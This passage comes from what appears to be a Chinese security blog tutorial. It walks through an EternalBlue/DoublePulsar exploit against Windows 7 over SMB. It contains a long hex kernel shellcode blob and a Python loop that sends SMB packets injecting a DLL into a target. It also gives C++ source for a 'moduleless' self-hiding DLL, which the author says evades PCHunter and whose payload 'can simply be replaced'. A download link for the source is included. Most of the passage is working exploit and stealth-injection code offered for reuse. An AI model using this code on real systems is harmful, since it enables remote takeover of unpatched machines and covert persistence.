x28x00x00x00x00x00x00x00x52x48xF7xE2x5Ax48x03x45x10x49x89xC2x49x83xC2x24x48x31xFFx41x8Bx3AxC7x85xA6x00x00x00x00x00x00x00x48xF7xC7x00x00x00x02x0Fx85x9Fx00x00x00x48xF7xC7x00x00x00x40x74x0AxC7x85xA6x00x00x00x02x00x00x00x49xBAx00x00x00x80x00x00x00x00x4Cx85xD7x74x0AxC7x85xA6x00x00x00x04x00x00x00x48xF7xC7x00x00x00x20x74x26x83xBDxA6x00x00x00x02x75x0AxC7x85xA6x00x00x00x20x00x00x00x83xBDxA6x00x00x00x04x75x0AxC7x85xA6x00x00x00x40x00x00x00x48x8Bx7Dx20x48x89xC1x48x83xC1x0Cx4Dx31xD2x44x8Bx11x4Cx01xD7x49x89xC2x49x83xC2x08x41x8Bx0Ax52x4Cx8Dx8DxAAx00x00x00x4Cx8Bx85xA6x00x00x00x48x89xCAx48x89xF9x48x83xECx20xFFx56x30x48x83xC4x20x5Ax48x85xC0x74x08x48xFFxC2xE9x19xFFxFFxFFx48x31xC0x48xF7xD0xEBx03x48x31xC0x59x5Bx5Ax5FxC3x52x57x48xBAx00x00x00x00x00x00x00x00xEBx0Cx52x57x48xBAx01x00x00x00x00x00x00x00x48x8Bx45x20x4Cx8Bx55x08x49x83xC2x28x48x31xFFx41x8Bx3Ax48x01xF8x49xB8x00x00x00x00x00x00x00x00x48x8Bx4Dx20x48x83xECx20xFFxD0x48x83xC4x20x48x31xC0x5Fx5AxC3x48x39xECx0Fx8DxAAx00x00x00x57x56x53x48x89xE6x48x83xC6x0Cx55x6Ax00x48x89xE3x51x52x48x89xE9x48x29xF1x48x83xF9x08x0Fx8Cx81x00x00x00x50x52x53x48xB8x0Fx00x00x00x00x00x00x00x48x6BxC0x08x48x39xC8x7Dx03x48x89xC1x48xBAx00x00x00x00x00x00x00x00x48x89xC8x48xBBx08x00x00x00x00x00x00x00x48xF7xFBx48xFFxC8x6Ax00x48x83xF8x00x75xF5x48x01xCCx5Bx5Ax58x48x89xE5x48x89xE7x48x29xCFx48x89xFCxF3xA4x48x89x23x48x8Bx4BxF8x48x8Bx53xF0x48xC7x43xF8x00x00x00x00x48xC7x43xF0x00x00x00x00x48xC7x04x24xFFxFFxFFxFFx48xBExEExEExEExEExEExEExEExEExFFxE0x59x59x5Dx5Dx5Bx5Ex5FxFFxE0x48x89xE1x48x2Bx4Dx08x48x83xE9x04x48x89xECx48x83xC4x0Cx5Dx5Bx5Ex5Fx5Ax48x01xCCxFFxE2x00x00x00x00x57x52x53x51x48xB8x08x00x00x00x00x00x00x00x48xBAx0Cx00x00x00x00x00x00x00x48xF7xE2x48x8Bx55x18x48x01xC2x48x83xC2x04x48x31xDBx8Bx1Ax48xC1xEBx02x48xB8x0Fx00x00x00x00x00x00x00x48xF7xE3x48x89x45x68x49xB9x40x00x00x00x00x00x00x00x49xB8x00x30x00x00x00x00x00x00x48x89xC2x48x31xC9x48x83xECx20xFFx56x08x48x83xC4x20x48x85xC0x74x7Cx48x89x45x60x48x8Bx46x58x48x8BxBDxAEx00x00x00x48x83xC7x03x48x89x07x48x8Bx46x68x48xA9x00x00x00x00x74x2Ex48x8Bx85xBEx00x00x00x48x8Bx9DxC6x00x00x00x48x89x03x48x8Bx5Ex60x48x8BxBDxC6x00x00x00x48x29xDFx48x8Bx9DxB6x00x00x00x48xFFxC3x48x89x3BxEBx14x48x8Bx85xBEx00x00x00x48x8BxBDxB6x00x00x00x48xFFxC7x48x89x07x48x8Bx46x68x48xA9x01x00x00x00x74x14x48x8BxBDxB6x00x00x00xC6x07xBFxEBx08x48x31xC0x48xF7xD0xEBx03x48x31xC0x59x5Bx5Ax5FxC3x57x52x53x51x56x50x48x8Bx7Dx60x48x8Bx45x70x48x01xC7x48x89xEEx48x81xC6x80x00x00x00x48xB9x0Fx00x00x00x00x00x00x00xF3xA4x48x8Bx7Dx60x48x8Bx45x70x48x01xC7x48x83xC7x00x48xFFxC7x48x8Bx55x40x48x8Bx1Ax48x89x1Fx48x8BxB5xCEx00x00x00x48x8Bx7Dx60x48x8Bx45x70x48x01xC7x48x83xC7x0Ax48xFFxC7x48x83xC7x08x48x29xFEx48x8Bx7Dx60x48x8Bx45x70x48x01xC7x48x83xC7x0Ax48xFFxC7x48x89x37x48x8Bx7Dx60x48x8Bx45x70x48x01xC7x48x8Bx75x40x48x89x3Ex48x8Bx45x70x48x83xC0x0Fx48x89x45x70x58x5Ex59x5Bx5Ax5FxC3x57x52x53x51x56xEBx4Dx48x8Bx7Dx00x48x89xDAx48x83xC2x0Cx48x03x3Ax48x89xE9x48x81xC1x8Fx00x00x00x48x89xFAx48x83xECx20xFFx56x28x48x83xC4x20x48x85xC0x74x22x48x89xE9x48x81xC1x9Ax00x00x00x48x89xFAx48x83xECx20xFFx56x28x48x83xC4x20x48x85xC0x74x05x48x31xC0xEBx0Cx48xB8x01x00x00x00x00x00x00x00xEBx00x5Ex59x5Bx5Ax5FxC3x57x52x53x51x56x48x8Bx7Dx48x48x89xFAx48x83xC2x00x66x8Bx1Ax66x81xFBx4Dx5Ax0Fx85x9Bx00x00x00x48x89xFAx48x83xC2x3Cx48x31xDBx8Bx1Ax48x01xDFx48x89xFAx48x83xC2x00x48x31xDBx8Bx1Ax48x81xFBx50x45x00x00x75x77x48x89xFEx48x83xC6x14x48x31xDBx66x8Bx1Ex48x89xFEx48x83xC6x18x48x01xDEx48x89xFBx48x83xC3x06x48x31xC9x66x8Bx0Bx48x31xD2x48x89xF3x48x83xC3x0Cx48x8Bx7Dx48x4Dx31xD2x44x8Bx13x4Cx01xD7x48x39xF8x7Cx2Bx48x89xF3x48x83xC3x08x4Dx31xD2x44x8Bx13x4Cx01xD7x48x39xF8x7Dx16x49x89xF2x49x83xC2x24x48x31xDBx41x8Bx1Ax48xF7xC3x00x00x00x20x75x11x48x83xC6x28x48xFFxC2x48x39xCAx7CxB0x48x31xC0xEBx0Cx48xB8x01x00x00x00x00x00x00x00xEBx00x5Ex59x5Bx5Ax5FxC3xEBx4Dx90x90x90x90x90x90x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x1Ex00x00x00x21x0Dx00x00x4Ex0Dx00x00x00x09x00x00x00x5Ex0Dx00x00x00x00x00x00x00x00x00x00xE8x00x00x00x00x58x48x8Bx60xC6x48x8Bx68xCEx48x8Bx70xD6x48x8Dx0DxCAxFFxFFxFFx48x83xECx20xFFx56x40x48x83xC4x20xE9x11x01x00x00x4Cx89xC6xE9x09x01x00x00x54x55x51x52x53x56x57x48x31xDBx65x48x8Bx5Bx30x48x8Bx5Bx60x48x8Bx5Bx18x48x8Bx5Bx10x48x8Bx73x60x48x85xF6x0Fx84xA6x00x00x00x48x8Bx6Bx30x48x85xEDx0Fx84x99x00x00x00x48x31xD2xC1xC2x05x66xADx0Cx20x30xC2x66x83x3Ex00x75xF1x48x8Bx1Bx48x3Bx54x24x20x75xCAx48x89xEFx66x81x3Fx4Dx5Ax75x73x8Bx7Dx3Cx48x01xEFx81x3Fx50x45x00x00x75x65x48x89xF9x48x83xC1x18x48x85xC9x74x59x48x31xD2x8BxBFx88x00x00x00x48x01xEFx8Bx57x1Cx48x01xEAx8Bx5Fx20x48x01xEBx8Bx7Fx24x48x01xEFx49x89xD1x8Bx33x48x01xEEx48x31xD2xC1xC2x05xACx0Cx20x30xC2x80x3Ex00x75xF3x48x3Bx54x24x18x74x0Cx48x83xC7x02x48x83xC3x04xE2xDAxEBx10x48x0FxB7x17x48xC1xE2x02x4Cx01xCAx8Bx02x48x01xE8x5Fx5Ex5Bx5Ax59x5Dx5CxC3x06xDFxB0x2Cx51x33x8Ax8DxA4x00x78x95x27x85x00x3Bx00xA1xB4x00xDBxB6xB6xE5x00xC4x22x07xE2x00x82x5Ax15x4Ax00x02x55xF0xD6xDEx79x03xAAx86x00x0DxC4x8AxDCx00x00x48x8Bx26x50x48x31xC0x48x8Dx0Dx33x00x00x00x48x8Dx1Dx2Cx00x00x00x48x29xD9x48x89xDFxF3xAAx48x8Dx0Dx0Dx00x00x00x48x8Dx1Dx96xF0xFFxFFx48x29xD9x48x89xDFxF3xAAx58x41x5Fx41x5Ex41x5Dx41x5Cx5Ex5Fx5Dx5BxC3xEBx08x00x14x00x00x01x00x00x00"
        f = open(dllfile,"rb")
	dll_hex = f.read()
	f.close()
	#dll_hex += "x00"*3
	array , ncount = make_smb_request(kernel_shellcode + dll_hex,key)
	for i in range(ncount):
		#print binascii.b2a_hex(array[i])
		print i+4,",len:",len(array[i])
		s.sendall(array[i])
		data = s.recv(1024)
		print i+4,"--->",data
		#end1
	        step_7_data ="x00x00x00x23xFFx53x4Dx42x71x00x00x00x00x18x07xC0x00x00x00x00x00x00x00x00x00x00x00x00x00x08xFFxFEx00x08x42x00x00x00x00"
	        s.sendall(step_7_data)
	        data = s.recv(1024)
	        print 7,data
	        #end2
	        step_8_data ="x00x00x00x27xFFx53x4Dx42x74x00x00x00x00x18x07xC0x00x00x00x00x00x00x00x00x00x00x00x00x00x08xFFxFEx00x08x42x00x02xFFx00x27x00x00x00"
	        s.sendall(step_8_data)
	        data = s.recv(1024)
	        print 8,data
	        print "------Inject dll done!------"
                s.close()

0x5: 永恒之蓝 + 自隐藏模块注入

我们写的win7下的exploit功能就算基本完成了,但是如果要想完成一次成熟的攻击, 不可能注入了进程之后进程又崩掉了,dll注入是和权限有直接关系的,Doubleplusar执行后是nt权限,可以采用无模块注入来注入到受害者的机器测试后发现同时也解决进程崩掉的问题这里顺便提一下无模块注入中的一些知识。关于dll注入和 x86 x64 进程互写互读的知识有兴趣可以去看看. 这里介绍一种关于模块自隐藏的知识

:DllMain第一次执行时,申请一块内存把DLL文件进行模拟加载,然后再调用模拟加载PE的DllMain,第二次的DllMain就在非模块的内存中执行了。DLL自卸载说起来也不难,是用MOMODALMARK标记DllMain的返回值  类似于MemoryLoadLibrary 的功能

上代码:

// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "stdafx.h"
#include "MemoryLoad.h"

//创建一个进程互斥量  防止无模块DLL多次注入
BOOL IsMutexExist(char* pstrMutex)
{
	BOOL bRet = FALSE;
	HANDLE hMutex = NULL;

	hMutex = CreateMutexA(NULL, TRUE, pstrMutex);
	if (hMutex)
	{
		if (GetLastError() == ERROR_ALREADY_EXISTS)
			bRet = TRUE;
		ReleaseMutex(hMutex);
		CloseHandle(hMutex);
	}
	else
	{
		bRet = TRUE;
	}
	return bRet;

}
//调用LoadPE.cpp里的函数,自行处理PE加载,把DLL在新申请的内存加载起来,并执行入口函数
void LaunchNoModule()
{
	LaunchDll((char*)dllModuleName, NO_MODULE_MARK);
}
unsigned int  __stdcall NoModuleThread(void* lpParameter)
{
	while (TRUE)
	{
		Sleep(1000);
		OutputDebugString(L"Test by IronMan.");
	}

	return TRUE;
}
//调用LoadPE.cpp里的函数,自行处理PE加载,把DLL在新申请的内存加载起来,并执行入口函数
void NoModuleEntryCall(HMODULE hModule, DWORD ul_reason_for_call, char* pstrModuleName)
{
	TCHAR szMutexName[MAX_PATH];
	wsprintf(szMutexName, L"Test 15pb bingo! %d", GetCurrentProcessId());
	g_hMutex = CreateMutex(NULL, TRUE, szMutexName);

	TCHAR szLog[MAX_PATH] = { 0 };
	wsprintf(szLog, L"NoModuleEntryCall Module Start:%p", hModule);
	OutputDebugString(szLog);
	//下面为正常Dll功能代码


	CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)NoModuleThread, NULL, NULL, NULL);


}
BOOL ChooseSub(HMODULE hModule, DWORD ul_reason_for_call, char* pstrModuleName)
{
	BOOL bRet = FALSE;
	GetModuleFileNameA(NULL, exeModuleName, MAX_PATH);
	if (ul_reason_for_call == NO_MODULE_MARK)
		//	strcpy((char*)dllModuleName,pstrModuleName);
		int a = 1;
	else
		GetModuleFileName(hModule, dllModuleName, MAX_PATH);

	if (ul_reason_for_call == NO_MODULE_MARK)
	{
		NoModuleEntryCall(hModule, DLL_PROCESS_ATTACH, 0);
		bRet = TRUE;
	}
	else
	{
		LaunchNoModule();
		bRet = FALSE;
	}
	return bRet;


}
BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
					 )
{
	BOOL  bRet = FALSE;
	if (ul_reason_for_call == DLL_PROCESS_ATTACH || ul_reason_for_call == NO_MODULE_MARK)
	{
		TCHAR szMutexName[MAX_PATH];
		wsprintf(szMutexName, L"yanshier2013nomoduleinject%d", GetCurrentProcessId());
		if (IsMutexExist((char*)szMutexName))
			return FALSE;

		bRet = ChooseSub(hModule, ul_reason_for_call, (char *)lpReserved);
	}
	else
	{
		if (ul_reason_for_call == DLL_PROCESS_DETACH)
		{
			ReleaseMutex(g_hMutex);
			CloseHandle(g_hMutex);
			bRet = TRUE;
		}
	}
	return bRet;
}

我注入了NTFSinfo这个程序.用PChunter是看不到自己注入的模块的

每隔一秒用 OutputString打印出一句 Test by IronMan. 需要的话直接在NoModuleThread替换功能就可以了。

http://p6.qhimg.com/t01e684ad6f55fbfa50.png

自卸载dll源码编译 vs2010 vs2013

源码打包地址: http://pan.baidu.com/s/1miObL00

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读
|发表评论
|评论列表
加载更多